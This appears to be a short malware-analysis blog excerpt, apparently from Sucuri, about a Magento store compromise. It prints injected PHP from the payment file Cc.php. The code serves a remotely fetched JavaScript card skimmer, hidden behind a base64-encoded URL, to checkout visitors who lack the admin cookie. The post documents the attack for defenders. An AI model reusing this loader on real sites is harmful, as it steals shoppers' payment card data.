Magento PHP Injection Loads JavaScript Skimmer

Magento PHP Injection Loads JavaScript Skimmer

A Magento website owner was concerned about malware and reached out to our team for assistance. Upon investigation, we found the website contained a PHP injection in one of the Magento files: ./app/code/core/Mage/Payment/Model/Method/Cc.php


if ($_SERVER[“REQUEST_METHOD”] === “GET”){
if (strpos($_SERVER[“REQUEST_URI”], “/onestepcheckout/index/”) !== false){
if(!isset($_COOKIE[“adminhtml”])){
echo file_get_contents(base64_decode(“aHR0cHM6Ly91bmRlcnNjb3JlZndbLl1jb20vc3JjL2tyZWEuanM=”));
}
}
}

To make it more difficult to detect, the JavaScript skimmer is loaded using the PHP function file_get_contents and the URL obfuscated with base64.

Continue reading Magento PHP Injection Loads JavaScript Skimmer at Sucuri Blog.

Via Sucuri.net

Tags: , ,